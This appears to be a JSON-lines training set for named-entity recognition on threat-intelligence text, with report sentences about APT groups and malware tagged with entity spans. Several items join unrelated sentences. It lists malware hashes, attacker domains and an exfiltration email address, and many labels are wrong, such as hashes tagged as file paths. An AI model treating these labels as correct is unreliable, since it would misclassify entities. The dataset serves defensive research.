{"text": "Path – location of the root “ stash ” directory Ext – search for files with one of these extensions only Date – search for files not earlier than this date Internal name : NvCpld.dll ( from export table ) , msdetltemp.dll ( from resources ) , IGFSRVC.dll ( from resources ) File format : PE32 DLL File size : 76,288 bytes MD5s : 8b238931a7f64fddcad3057a96855f6c , ce151285e8f0e7b2b90162ba171a4b90 Linker version : 11.0 , Microsoft Visual Studio Linker timestamps : 2015.05.29 11:20:32 ( GMT ) , 2006.11.25 04:39:15 ( GMT ) Exported functions :", "spans": {"FILEPATH: NvCpld.dll": [[172, 182]], "FILEPATH: msdetltemp.dll": [[207, 221]], "FILEPATH: IGFSRVC.dll": [[243, 254]], "TOOL: DLL": [[293, 296]], "FILEPATH: 8b238931a7f64fddcad3057a96855f6c": [[329, 361]], "FILEPATH: ce151285e8f0e7b2b90162ba171a4b90": [[364, 396]], "ORGANIZATION: Microsoft": [[421, 430]], "TOOL: Visual Studio": [[431, 444]], "TOOL: GMT": [[487, 490], [517, 520]]}, "info": {"id": "cyberner_stix_train_001866", "source": "cyberner_stix_train"}}
{"text": "Mitigations Stay protected from mobile malware by taking these precautions : Do not download apps from unfamiliar sites Only install apps from trusted sources Pay close attention to the permissions requested by apps Install a suitable mobile security app , such as SEP Mobile or Norton , to protect your device and data Keep your operating system up to date Make frequent backups of important data Indicators of Compromise ( IoCs ) Package names : anew.football.cup.world.com.worldcup com.coder.glancelove com.winkchat APK SHA2 : 166f3a863bb2b66bda9c76dccf9529d5237f6394721f46635b053870eb2fcc5a The publicly available backdoors and tools utilized by APT33 – including NANOCORE , NETWIRE , and ALFA Shell – are all available on Iranian hacking websites , associated with Iranian hackers , and used by other suspected Iranian threat groups . This dropper used an FTP with hardcoded credentials to receive its . It is therefore likely that they will try many things to compromise your mobile phone , including using zero - day attacks or unknown vulnerabilities .", "spans": {"THREAT_ACTOR: APT33": [[650, 655]], "TOOL: NANOCORE": [[668, 676]], "TOOL: NETWIRE": [[679, 686]], "TOOL: ALFA Shell": [[693, 703]], "THREAT_ACTOR: hackers": [[778, 785]], "THREAT_ACTOR: threat groups": [[824, 837]], "THREAT_ACTOR: zero - day attacks": [[1013, 1031]], "THREAT_ACTOR: unknown vulnerabilities": [[1035, 1058]]}, "info": {"id": "cyberner_stix_train_001867", "source": "cyberner_stix_train"}}
{"text": "The more advanced variant , on the other hand , will use an algorithm to generate a periodically-changing Twitter account name and will then attempt to find tweets from that account containing links to the actual download location of the commands to execute .", "spans": {"TOOL: Twitter": [[106, 113]]}, "info": {"id": "cyberner_stix_train_001868", "source": "cyberner_stix_train"}}
{"text": "Example of using native code for obfuscation Examples of using string concatenation for obfuscation Example of encrypting strings in the Trojan Asacub distribution geography Asacub is primarily aimed at Russian users : 98 % of infections ( 225,000 ) occur in Russia , since the cybercriminals specifically target clients of a major Russian bank . Despite multiple public disclosures of their activities , BRONZE UNION remains an active and formidable threat as of this publication . We will continue to monitor this hacking group ’s activities and their toolkit ’s developments . Threat actors typically register and use several domains in order to discretely lead their malware to their Command and Control ( C&C ) servers .", "spans": {"MALWARE: Asacub": [[144, 150], [174, 180]], "THREAT_ACTOR: Threat actors": [[580, 593]], "SYSTEM: several domains": [[621, 636]], "MALWARE: malware": [[671, 678]], "SYSTEM: Command and Control ( C&C ) servers": [[688, 723]]}, "info": {"id": "cyberner_stix_train_001869", "source": "cyberner_stix_train"}}
{"text": "The spyware in this analysis was portraying itself as the Netflix app . Silence has conducted at least three campaigns using recon emails , followed by malicious mail sent to an updated recipient list . Additionally the reports on Carbanak show a different picture , where banks targeted outside of Russia , specifically Europe , USA and Japan are mentioned , which does not match our research .", "spans": {"SYSTEM: Netflix app": [[58, 69]], "THREAT_ACTOR: Silence": [[72, 79]], "MALWARE: Carbanak": [[231, 239]], "ORGANIZATION: banks": [[273, 278]]}, "info": {"id": "cyberner_stix_train_001870", "source": "cyberner_stix_train"}}
{"text": "Phantom of the Opaera :", "spans": {}, "info": {"id": "cyberner_stix_train_001871", "source": "cyberner_stix_train"}}
{"text": "Several RATs are used by PUTTER PANDA . The role of the .NET module is to deliver the known KopiLuwak JavaScript Trojan .", "spans": {"TOOL: RATs": [[8, 12]], "THREAT_ACTOR: PUTTER PANDA": [[25, 37]], "FILEPATH: .NET module": [[56, 67]], "FILEPATH: KopiLuwak JavaScript": [[92, 112]], "MALWARE: Trojan": [[113, 119]]}, "info": {"id": "cyberner_stix_train_001872", "source": "cyberner_stix_train"}}
{"text": "This is part of a class called CaptureService , which already existed in the previous version but it was not duly implemented . If a target of the spear phishing described in \" Phase 2 : malware deployment \" opened the email attachment and , crucially , clicked on the icon in the attachment , this would lead to the target 's computer becoming infected with the \" Scout \" malware tool from the RCS Galileo platform . All but one sample that we identified were written to this folder as word.exe . During the SolarWinds Compromise , APT29 registered devices in order to enable mailbox syncing via the Set - CASMailbox command . .006", "spans": {"TOOL: Scout": [[365, 370]], "FILEPATH: word.exe": [[487, 495]], "THREAT_ACTOR: SolarWinds Compromise": [[509, 530]], "THREAT_ACTOR: APT29": [[533, 538]]}, "info": {"id": "cyberner_stix_train_001873", "source": "cyberner_stix_train"}}
{"text": "One such case was detailed on page 10 as an apparent evasion attempt .", "spans": {}, "info": {"id": "cyberner_stix_train_001874", "source": "cyberner_stix_train"}}
{"text": "The new wave of attacks included a new generation of USB stealers deployed by Sofacy , with initial versions dating to February 2015 .", "spans": {"MALWARE: USB stealers": [[53, 65]], "THREAT_ACTOR: Sofacy": [[78, 84]]}, "info": {"id": "cyberner_stix_train_001875", "source": "cyberner_stix_train"}}
{"text": "The APT38 targeted news outlets known for their business and financial sector reporting , probably in support of efforts to identify and compromise additional financial institutions . The attackers upload data to the account , which is downloaded by the implant , decrypted and interpreted .", "spans": {"THREAT_ACTOR: APT38": [[4, 9]], "ORGANIZATION: news outlets": [[19, 31]], "ORGANIZATION: financial sector": [[61, 77]], "ORGANIZATION: financial institutions": [[159, 181]]}, "info": {"id": "cyberner_stix_train_001876", "source": "cyberner_stix_train"}}
{"text": "Name MD5 Purpose msconf.exe 55fb01048b6287eadcbd9a0f86d21adf Main module , reverse shell network.exe f673bb1d519138ced7659484c0b66c5b Sending exfiltrated data system.exe d3baa45ed342fbc5a56d974d36d5f73f Surrounding sound recording by mic update.exe 395f9f87df728134b5e3c1ca4d48e9fa Keylogging wow.exe It appears that the attackers may have impersonated the identity of a real young woman and stole her pictures to construct the fake profile , along with a professional biography also stolen from yet another person . Putter Panda is a Chinese threat group that has been attributed to Unit 61486 of the 12th Bureau of the PLA ’s 3rd General Staff Department ( GSD ) .", "spans": {"THREAT_ACTOR: attackers": [[321, 330]], "THREAT_ACTOR: Putter Panda": [[517, 529]], "ORGANIZATION: Unit 61486 of the 12th Bureau of the PLA ’s 3rd General Staff Department": [[584, 656]], "ORGANIZATION: GSD": [[659, 662]]}, "info": {"id": "cyberner_stix_train_001877", "source": "cyberner_stix_train"}}
{"text": "In this blog post we will detail our analysis of the malware and associated indicators , look closely at the decoy files , and leverage available information to make an educated guess on the possible intended target .", "spans": {}, "info": {"id": "cyberner_stix_train_001878", "source": "cyberner_stix_train"}}
{"text": "This means that the malware can do anything from harvest the user 's banking credentials , to monitoring the device 's location . This malware has been used since October 2018 by Cloud Atlas as a validator and now as a second stage . In one instance , APT37 weaponized a video downloader application with KARAE malware that was indiscriminately distributed to South Korean victims through torrent websites .", "spans": {"THREAT_ACTOR: Cloud Atlas": [[179, 190]], "THREAT_ACTOR: APT37": [[252, 257]], "MALWARE: KARAE": [[305, 310]], "MALWARE: malware": [[311, 318]]}, "info": {"id": "cyberner_stix_train_001879", "source": "cyberner_stix_train"}}
{"text": "In the March attacks , the Flash object is only loaded if the user scrolls through the entire content of the delivery document and views the specific page the Flash object is embedded on .", "spans": {"TOOL: Flash": [[27, 32], [159, 164]]}, "info": {"id": "cyberner_stix_train_001880", "source": "cyberner_stix_train"}}
{"text": "Finally , we have also observed victims being infected with OnionDuke after they were already infected with CozyDuke .", "spans": {"MALWARE: OnionDuke": [[60, 69]], "MALWARE: CozyDuke": [[108, 116]]}, "info": {"id": "cyberner_stix_train_001881", "source": "cyberner_stix_train"}}
{"text": "n one case from 2013 , the target was sent a malicious document through a spear phishing email message . This technique hides the true C2 server from researchers that do not have access to both the rastls.dll and Sycmentec.config files .", "spans": {"MALWARE: malicious document": [[45, 63]], "TOOL: C2": [[135, 137]], "FILEPATH: rastls.dll": [[198, 208]], "FILEPATH: Sycmentec.config files": [[213, 235]]}, "info": {"id": "cyberner_stix_train_001882", "source": "cyberner_stix_train"}}
{"text": "fli.fedora-dns-update.com Whoisguard Unknown Unknown .", "spans": {"DOMAIN: fli.fedora-dns-update.com": [[0, 25]], "TOOL: Whoisguard": [[26, 36]]}, "info": {"id": "cyberner_stix_train_001884", "source": "cyberner_stix_train"}}
{"text": "While both back door Trojans wait for commands from the threat actor , they can search for files and upload them to the specified server once activated . In this blog post we'll analyze two specific incidents apparently targeting victims in Vietnam and in India and we'll describe the capabilities of the custom backdoor being used that for convenience ( and to our knowledge , for a lack of an existing name ) we call KeyBoy , due to a string present in one of the samples .", "spans": {"THREAT_ACTOR: threat actor": [[56, 68]], "MALWARE: backdoor": [[312, 320]], "MALWARE: KeyBoy": [[419, 425]]}, "info": {"id": "cyberner_stix_train_001885", "source": "cyberner_stix_train"}}
{"text": "Like previously added functionality , the code is borrowed from the leaked Anubis Trojan source code . Most recently , on December 20 , 2018 , the U.S. Department of Justice charged two hackers associated with the Chinese Ministry of State Security (MSS) with global computer intrusion campaigns targeting intellectual property . As Kaspersky and Cybereason recently posted , Minzen is a modular malware that has both 32-bit and 64-bit components in its resource section or configuration data in its body .", "spans": {"MALWARE: Anubis": [[75, 81]], "ORGANIZATION: U.S. Department": [[147, 162]], "THREAT_ACTOR: hackers": [[186, 193]], "ORGANIZATION: Kaspersky": [[333, 342]], "ORGANIZATION: Cybereason": [[347, 357]], "MALWARE: Minzen": [[376, 382]]}, "info": {"id": "cyberner_stix_train_001886", "source": "cyberner_stix_train"}}
{"text": "After the demise of Storm , it was replaced by another new botnet known as Waledac that also leveraged peer-to-peer communications . Through the information exchanges used by people in the security industry , we learned that several Russian banks were struggling with malicious programs created specifically to attack a particular type of legal banking software .", "spans": {"TOOL: Waledac": [[75, 82]], "ORGANIZATION: security industry": [[189, 206]], "ORGANIZATION: banks": [[241, 246]]}, "info": {"id": "cyberner_stix_train_001887", "source": "cyberner_stix_train"}}
{"text": "The password of the sample we analyzed is : “ 6y7u^Y&U6y7u^Y&U6y7u^Y&U ” .", "spans": {}, "info": {"id": "cyberner_stix_train_001888", "source": "cyberner_stix_train"}}
{"text": "In later versions , when it starts , the Trojan additionally opens a phishing site in the browser that simulates a free ad service so as to dupe the user into entering their login credentials and bank card details . In addition to the spear phishes , FireEye ISIGHT Intelligence has observed APT10 accessing victims through global service providers . The first document was in English and a second in Russian .", "spans": {"ORGANIZATION: FireEye ISIGHT Intelligence": [[251, 278]], "THREAT_ACTOR: APT10": [[292, 297]]}, "info": {"id": "cyberner_stix_train_001889", "source": "cyberner_stix_train"}}
{"text": "By implementing best practices for phishing-type attacks—such as refraining from downloading files unless they are absolutely certain that they come from trustworthy sources—users can avoid being victimized by malware such as OSX_DOK.C that prey on users who lack awareness of phishing strategies .", "spans": {"MALWARE: OSX_DOK.C": [[226, 235]]}, "info": {"id": "cyberner_stix_train_001890", "source": "cyberner_stix_train"}}
{"text": "The Trojan sends an email to sahro.bella7@post.cz with sysscr.ops as the attachment , the string SCreen within the body and a subject with the unique system identifier via SMTPS from one of three previously used accounts .", "spans": {"MALWARE: Trojan": [[4, 10]], "TOOL: email": [[20, 25]], "EMAIL: sahro.bella7@post.cz": [[29, 49]], "FILEPATH: sysscr.ops": [[55, 65]]}, "info": {"id": "cyberner_stix_train_001891", "source": "cyberner_stix_train"}}
{"text": "Another example of FakeSpy ’ s anti-emulation techniques is how it uses the getMachine function , which uses the TelephonyManager class to check for the deviceID , phone number , IMEI , and IMSI . After a successful penetration , FIN7 uses its own backdoors and the CobaltStrike framework or Powershell Empire components to hop to interesting parts of the network , where it can monetize its access . MyWeb is the second-generation malware used by Ke3chang .", "spans": {"MALWARE: FakeSpy": [[19, 26]], "THREAT_ACTOR: FIN7": [[230, 234]], "TOOL: backdoors": [[248, 257]], "TOOL: CobaltStrike framework": [[266, 288]], "TOOL: Powershell": [[292, 302]], "MALWARE: MyWeb": [[401, 406]], "THREAT_ACTOR: Ke3chang": [[448, 456]]}, "info": {"id": "cyberner_stix_train_001892", "source": "cyberner_stix_train"}}
{"text": "In fact , AveMaria is a classic infostealer bot that collects all possible credentials from various types of software: browsers , email clients , messengers , etc , and can act as a keylogger . To spread the Corkow malware criminals use a drive-by downloads method , when victims are infected while visiting compromised legitimate websites .", "spans": {"MALWARE: AveMaria": [[10, 18]]}, "info": {"id": "cyberner_stix_train_001893", "source": "cyberner_stix_train"}}
{"text": "Firstly , as with the MiniDuke campaigns of February 2013 and CosmicDuke campaigns in the summer of 2014 , again the group clearly prioritized the continuation of their operations over maintaining stealth .", "spans": {"MALWARE: MiniDuke": [[22, 30]], "MALWARE: CosmicDuke": [[62, 72]]}, "info": {"id": "cyberner_stix_train_001894", "source": "cyberner_stix_train"}}
{"text": "In comparison to other threat groups , TG-3390 is notable for its tendency to compromise Microsoft Exchange servers using a custom backdoor and credential logger .", "spans": {"THREAT_ACTOR: TG-3390": [[39, 46]], "ORGANIZATION: Microsoft": [[89, 98]], "TOOL: Exchange": [[99, 107]]}, "info": {"id": "cyberner_stix_train_001895", "source": "cyberner_stix_train"}}
{"text": "The Flash exploit is mostly unobfuscated with only some light variable name mangling .", "spans": {"TOOL: Flash": [[4, 9]]}, "info": {"id": "cyberner_stix_train_001896", "source": "cyberner_stix_train"}}
{"text": "The information related to DeltaCharlie from the Operation Blockbuster Destructive Malware report should be viewed in conjunction with the IP S-PROT addresses listed in the .csv and .stix files provided within this alert .", "spans": {"MALWARE: DeltaCharlie": [[27, 39]], "TOOL: IP S-PROT addresses": [[139, 158]], "FILEPATH: .csv": [[173, 177]], "FILEPATH: .stix": [[182, 187]]}, "info": {"id": "cyberner_stix_train_001897", "source": "cyberner_stix_train"}}
{"text": "The basic functionality of the new documents and their PowerShell components matched what was previously disclosed .", "spans": {"TOOL: PowerShell": [[55, 65]]}, "info": {"id": "cyberner_stix_train_001898", "source": "cyberner_stix_train"}}
{"text": "It shows that the malware can detect whether it ’ s running in an emulated environment or a real mobile device , and can change its code pattern accordingly . In 2018-2019 , researchers of Kaspersky Lab’s Global Research and Analysis Team analyzed various campaigns that used the same Tactics Tools and Procedures (TTPs) as the historic FIN7 , leading the researchers to believe that this threat actor had remained active despite the 2018 arrests . A trait common to all three malware families we analyzed is that they use the IWebBrowser2 COM interface to perform their CnC communication .", "spans": {"ORGANIZATION: Kaspersky": [[189, 198]], "THREAT_ACTOR: FIN7": [[337, 341]], "THREAT_ACTOR: threat actor": [[389, 401]], "MALWARE: IWebBrowser2 COM": [[527, 543]]}, "info": {"id": "cyberner_stix_train_001899", "source": "cyberner_stix_train"}}
{"text": "Time delay to postpone displaying ads implemented by the adware Once the malicious app receives its configuration data , the affected device is ready to display ads as per the attacker ’ s choice ; each ad is displayed as a full screen activity . North Korea linked hackers are among the most prolific nation-state threats , targeting not only the U.S. and South Korea but the global financial system and nations worldwide . Moreover the metadata of the Office document contains the names of people who seems to work for a public organization .", "spans": {"ORGANIZATION: financial": [[384, 393]], "ORGANIZATION: nations": [[405, 412]], "TOOL: Office": [[454, 460]]}, "info": {"id": "cyberner_stix_train_001900", "source": "cyberner_stix_train"}}
{"text": "But GPlayed is an example of where this can go wrong , especially if a mobile user is not aware of how to distinguish a fake app versus a real one . 360 Threat Intelligence Center has reported on related indicators being attributed to BITTER APT a South Asian country suspected Indian APT in open source reporting . Specifically , the targeting of organizations in the aerospace and energy sectors indicates that the APT33 is likely in search of strategic intelligence capable of benefitting a government or military sponsor .", "spans": {"MALWARE: GPlayed": [[4, 11]], "ORGANIZATION: 360 Threat Intelligence Center": [[149, 179]], "THREAT_ACTOR: BITTER APT": [[235, 245]], "ORGANIZATION: aerospace": [[369, 378]], "ORGANIZATION: energy sectors": [[383, 397]], "THREAT_ACTOR: APT33": [[417, 422]], "ORGANIZATION: government": [[494, 504]], "ORGANIZATION: military": [[508, 516]]}, "info": {"id": "cyberner_stix_train_001901", "source": "cyberner_stix_train"}}
{"text": "The information discovered by Unit 42 and shared here indicates Scarlet Mimic is likely a well-funded and skillfully resourced cyber adversary . APT10 is known to have exfiltrated a high volume of data from multiple victims , exploiting compromised MSP networks , and those of their customers , to stealthily move this data around the world .", "spans": {"ORGANIZATION: Unit 42": [[30, 37]], "THREAT_ACTOR: Scarlet Mimic": [[64, 77]], "THREAT_ACTOR: APT10": [[145, 150]], "MALWARE: MSP networks": [[249, 261]], "ORGANIZATION: customers": [[283, 292]]}, "info": {"id": "cyberner_stix_train_001902", "source": "cyberner_stix_train"}}
{"text": "This sample is similar to those presented in other recent Marcher analyses [ 1 ] [ 2 ] . Cisco Talos will continue to monitor Sea Turtle and work with our partners to understand the threat as it continues to evolve to ensure that our customers remain protected and the public is informed . This group is responsible for the campaigns known as Operation Clandestine Fox , Operation Clandestine Wolf , and Operation Double Tap .", "spans": {"MALWARE: Marcher": [[58, 65]], "ORGANIZATION: Cisco Talos": [[89, 100]]}, "info": {"id": "cyberner_stix_train_001903", "source": "cyberner_stix_train"}}
{"text": "] com hxxp : //nttdocomo-qaq [ . The primary targets of APT28 are potential victims in several countries such as Ukraine , Spain , Russia , Romania , the United States and Canada . The Carbon Black ThreatSight team observed an interesting campaign over the last month . One initiative in the European Union has helped more than 1.5 million ransomware victims .", "spans": {"THREAT_ACTOR: APT28": [[56, 61]], "ORGANIZATION: Carbon Black ThreatSight": [[185, 209]], "ORGANIZATION: European Union": [[292, 306]], "ORGANIZATION: ransomware victims": [[340, 358]]}, "info": {"id": "cyberner_stix_train_001904", "source": "cyberner_stix_train"}}
{"text": "The first method is to send a specially crafted URL to the target via SMS or email . As with previous campaigns , and as highlighted in our annual M-Trends 2017 report , FIN7 is calling stores at targeted organizations to ensure they received the email and attempting to walk them through the infection process . the assignment variable is called “ block update variable ” CrowdStrike security researchers were working to develop proof - of - concept ( POC ) code for an exploit method indicative of the logging present after recent Play ransomware attacks .", "spans": {"ORGANIZATION: M-Trends": [[147, 155]], "THREAT_ACTOR: FIN7": [[170, 174]], "ORGANIZATION: CrowdStrike security researchers": [[373, 405]], "THREAT_ACTOR: Play ransomware attacks": [[533, 556]]}, "info": {"id": "cyberner_stix_train_001905", "source": "cyberner_stix_train"}}
{"text": "Attacks on the chemical industry are merely their latest attack wave .", "spans": {}, "info": {"id": "cyberner_stix_train_001906", "source": "cyberner_stix_train"}}
{"text": "By utilizing a hook library , it is more complicated for users to manually detect and remove the infection from their systems , giving the threat actors more time to generate profit . PyLocky was found to be targeting entities in France and Germany .", "spans": {"TOOL: hook library": [[15, 27]], "MALWARE: PyLocky": [[184, 191]]}, "info": {"id": "cyberner_stix_train_001907", "source": "cyberner_stix_train"}}
{"text": "Kaspersky goes on to state that by obtaining log files from the MiniDuke command and control servers , they were able to identify high-profile victims from Ukraine , Belgium , Portugal , Romania , the Czech Republic , Ireland , the United States and Hungary .", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "MALWARE: MiniDuke": [[64, 72]], "TOOL: command and control": [[73, 92]]}, "info": {"id": "cyberner_stix_train_001908", "source": "cyberner_stix_train"}}
{"text": "In certain situations , variants intercept compromised apps ’ original legitimate ads display events and report back to the intended ad-exchange with the “ Agent Smith ” campaign hacker ’ s ad IDs . The pie chart in Figure 8 shows that the vast majority ( 73% ) of the hosts are geographically located in Thailand , which matches the known targeting of this threat group . Given the threat ’s persistence mechanisms , polymorphism , and use of fileless techniques , behavior-based detection was a critical component of the comprehensive protection against this malware and other threats that exhibit similar malicious behaviors . They also used AdFind to enumerate domains and to discover trust between federated domains .", "spans": {"MALWARE: Agent Smith": [[156, 167]], "TOOL: AdFind": [[645, 651]]}, "info": {"id": "cyberner_stix_train_001909", "source": "cyberner_stix_train"}}
{"text": "Why Whitefly uses these two different loaders in some of its attacks remains unknown . The files uploaded to this webshell included the same compiled python script that would scan remote systems that were vulnerable to CVE-2017-0144 ( EternalBlue ) that we saw uploaded to the other errr.aspx webshell .", "spans": {"THREAT_ACTOR: Whitefly": [[4, 12]], "TOOL: loaders": [[38, 45]], "MALWARE: python script": [[150, 163]], "VULNERABILITY: CVE-2017-0144": [[219, 232]], "VULNERABILITY: EternalBlue": [[235, 246]], "FILEPATH: errr.aspx": [[283, 292]]}, "info": {"id": "cyberner_stix_train_001910", "source": "cyberner_stix_train"}}
{"text": "ba9f4d3f4eba3fa7dce726150fe402e37359a7f36c07f3932a92bd711436f88c e194268bf682d81fc7dc1e437c53c952ffae55a9d15a1fc020f0219527b7c2ec С & C 2014–2015 : secondby.ru darkclub.net holerole.org googleapis.link 2015–2016 : test2016.ru blackstar.pro synchronize.pw lineout.pw sync-weather.pw The Android version , for instance , can steal SMS messages , accounts , contacts , and files , as well as record audio . APT40 engages in broader regional targeting against traditional intelligence targets , especially organizations with operations in Southeast Asia .", "spans": {"MALWARE: Android version": [[286, 301]], "THREAT_ACTOR: APT40": [[404, 409]]}, "info": {"id": "cyberner_stix_train_001911", "source": "cyberner_stix_train"}}
{"text": "After an infected app is installed , it sends data about the device to the campaign ’ s Command and Control ( C & C ) server . The APT39 were using an improved version of Remexi in what the victimology suggests might be a domestic cyber-espionage operation . , Command messages are used in ICS networks to give direct instructions to control systems devices .", "spans": {"THREAT_ACTOR: APT39": [[131, 136]]}, "info": {"id": "cyberner_stix_train_001912", "source": "cyberner_stix_train"}}
{"text": "It can also create a simple HTTP server on the infected device to deceive victims . Buhtrap still make extensive use of NSIS installers as droppers and these are mainly delivered through malicious documents . Thus , the script provides to run “ winserv.exe ” .", "spans": {"THREAT_ACTOR: Buhtrap": [[84, 91]], "THREAT_ACTOR: NSIS installers": [[120, 135]], "FILEPATH: winserv.exe": [[245, 256]]}, "info": {"id": "cyberner_stix_train_001913", "source": "cyberner_stix_train"}}
{"text": "All of these Google Play Store pages have been taken down by Google . The email address is associated with the Lebanese domain of a major global financial institution . The persistence is achieved by adding an entry with the name \" ChromeUpdater \" to the ' Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run ' . From what we ’ve seen in Hack520 ’s blog , as well as the infrastructure deployed around it , it is quite safe to say that Hack520 is involved in aspects of the VPS service activity provided to groups like Winnti and other cybercriminals or threat actors .", "spans": {"SYSTEM: Google Play Store": [[13, 30]], "ORGANIZATION: Google": [[61, 67]], "ORGANIZATION: financial institution": [[145, 166]], "SYSTEM: VPS service": [[472, 483]], "THREAT_ACTOR: Winnti": [[517, 523]], "THREAT_ACTOR: threat actors": [[552, 565]]}, "info": {"id": "cyberner_stix_train_001914", "source": "cyberner_stix_train"}}
{"text": "This made us believe the two groups were connected , although it looks they split ways at a certain point , with the original Miniduke group switching to the CosmicDuke implant in 2014 .", "spans": {"THREAT_ACTOR: Miniduke": [[126, 134]], "MALWARE: CosmicDuke": [[158, 168]]}, "info": {"id": "cyberner_stix_train_001915", "source": "cyberner_stix_train"}}
{"text": "APT28 : New Espionage Operations Target Military and Government Organizations .", "spans": {"THREAT_ACTOR: APT28": [[0, 5]], "ORGANIZATION: Military and Government Organizations": [[40, 77]]}, "info": {"id": "cyberner_stix_train_001916", "source": "cyberner_stix_train"}}
{"text": "Older versions of these USBSTEALER modules were previously described by our colleagues from ESET .", "spans": {"TOOL: USBSTEALER": [[24, 34]], "ORGANIZATION: ESET": [[92, 96]]}, "info": {"id": "cyberner_stix_train_001917", "source": "cyberner_stix_train"}}
{"text": "Palo Alto Networks customers are protected from the threat described in this blog through Threat Prevention signatures for the exploits and C2 traffic as well as through WildFire .", "spans": {"TOOL: Palo Alto Networks": [[0, 18]], "TOOL: C2": [[140, 142]], "TOOL: WildFire": [[170, 178]]}, "info": {"id": "cyberner_stix_train_001918", "source": "cyberner_stix_train"}}
{"text": "Until mid-2015 , Rotexy used a plain-text JSON format to communicate with its C & C . For example , DeltaAlfa specifies a DDoS bot family identified as Alfa . RATANKBA is delivered to its victims using a variety of lure documents , including Microsoft Office documents , malicious CHM files , and different script downloaders .", "spans": {"MALWARE: Rotexy": [[17, 23]], "MALWARE: DeltaAlfa": [[100, 109]], "TOOL: DDoS bot": [[122, 130]], "MALWARE: RATANKBA": [[159, 167]], "MALWARE: Microsoft Office documents": [[242, 268]], "MALWARE: CHM files": [[281, 290]]}, "info": {"id": "cyberner_stix_train_001919", "source": "cyberner_stix_train"}}
{"text": "The login originated from a computer on the same subnet , indicating that the attacker machine was physically close to the victim and on the same Wi-Fi network .", "spans": {"TOOL: Wi-Fi network": [[146, 159]]}, "info": {"id": "cyberner_stix_train_001920", "source": "cyberner_stix_train"}}
{"text": "This implies that the authors are actively working to optimize EventBot over time . The detection evasion techniques we observed in the Okrum malware include embedding the malicious payload within a legitimate PNG image , employing several anti-emulation and anti-sandbox tricks , as well as making frequent changes in implementation . DROPSHOT is a notable piece of malware used to deliver variants of the TURNEDUP backdoor .", "spans": {"MALWARE: EventBot": [[63, 71]], "MALWARE: Okrum": [[136, 141]], "MALWARE: DROPSHOT": [[336, 344]], "MALWARE: malware": [[367, 374]]}, "info": {"id": "cyberner_stix_train_001921", "source": "cyberner_stix_train"}}
{"text": "The infection started from .NET malware , disguised as a WFC wallet updater ( a9e960948fdac81579d3b752e49aceda ) .", "spans": {"ORGANIZATION: WFC": [[57, 60]], "FILEPATH: a9e960948fdac81579d3b752e49aceda": [[78, 110]]}, "info": {"id": "cyberner_stix_train_001922", "source": "cyberner_stix_train"}}
{"text": "File Detail : Info File name : job_titles_itworx.doc .", "spans": {"FILEPATH: job_titles_itworx.doc": [[31, 52]]}, "info": {"id": "cyberner_stix_train_001923", "source": "cyberner_stix_train"}}
{"text": "The way in which each backdoor does so however is significantly different .", "spans": {}, "info": {"id": "cyberner_stix_train_001924", "source": "cyberner_stix_train"}}
{"text": "It is possibly one of the most frequently asked questions on the Internet . this SWC was used to specifically target Turkish academic networks . Outlaw : 620635aa9685249c87ead1bb0ad25b096714a0073cfd38a615c5eb63c3761976 Tool Trojan.Linux.SSHBRUTE.B . In one exchange on Aug. 16 , 2012 , Ashley Madison ’s director of IT was asked to produce a list of all company employees with all - powerful administrator access .", "spans": {"TOOL: SWC": [[81, 84]], "THREAT_ACTOR: Outlaw": [[145, 151]], "FILEPATH: 620635aa9685249c87ead1bb0ad25b096714a0073cfd38a615c5eb63c3761976": [[154, 218]], "MALWARE: Trojan.Linux.SSHBRUTE.B": [[224, 247]], "ORGANIZATION: Ashley Madison ’s director of IT": [[286, 318]]}, "info": {"id": "cyberner_stix_train_001925", "source": "cyberner_stix_train"}}
{"text": "0cd9ac328d858d8d83c9eb73bfdc59a958873b3d71b24c888d7408d9512a41d7 ( Defence&Security_2018_Conference_Agenda.docx ) ndpmedia24.com .", "spans": {"FILEPATH: 0cd9ac328d858d8d83c9eb73bfdc59a958873b3d71b24c888d7408d9512a41d7": [[0, 64]], "FILEPATH: Defence&Security_2018_Conference_Agenda.docx": [[67, 111]], "DOMAIN: ndpmedia24.com": [[114, 128]]}, "info": {"id": "cyberner_stix_train_001926", "source": "cyberner_stix_train"}}
{"text": "The threat actors used two publicly available techniques , an AppLocker whitelisting bypass and a script to inject shellcode into the userinit.exe process . The titles and contents of these files suggest that the actor targeted individuals affiliated with these government agencies and the Fatah political party .", "spans": {"THREAT_ACTOR: actors": [[11, 17]], "MALWARE: userinit.exe": [[134, 146]], "ORGANIZATION: government agencies": [[262, 281]], "ORGANIZATION: Fatah political party": [[290, 311]]}, "info": {"id": "cyberner_stix_train_001927", "source": "cyberner_stix_train"}}
{"text": "First discussed in January 2013 in a Trend Micro whitepaper , FakeM is a Trojan that uses separate modules to perform its functionality . Beginning in 2017 , the Lazarus group heavily targeted individuals with spear phishing emails impersonating job recruiters which contained malicious documents .", "spans": {"ORGANIZATION: Trend Micro": [[37, 48]], "TOOL: FakeM": [[62, 67]], "TOOL: Trojan": [[73, 79]], "THREAT_ACTOR: Lazarus group": [[162, 175]], "TOOL: emails": [[225, 231]], "ORGANIZATION: job recruiters": [[246, 260]]}, "info": {"id": "cyberner_stix_train_001928", "source": "cyberner_stix_train"}}
{"text": "FIN7 is a financially motivated intrusion set that selectively targets victims and uses spear phishing to distribute its malware . This week the experts at FireEye discovered that a group of Chinese-based hackers called admin@338 had sent multiple MH370-themed spear phishing emails , the attackers targeted government officials in Asia-Pacific , it is likely for cyber espionage purpose .", "spans": {"THREAT_ACTOR: FIN7": [[0, 4]], "ORGANIZATION: financially": [[10, 21]], "ORGANIZATION: FireEye": [[156, 163]], "THREAT_ACTOR: admin@338": [[220, 229]], "TOOL: emails": [[276, 282]], "THREAT_ACTOR: attackers": [[289, 298]], "ORGANIZATION: government officials": [[308, 328]], "THREAT_ACTOR: cyber espionage": [[364, 379]]}, "info": {"id": "cyberner_stix_train_001929", "source": "cyberner_stix_train"}}
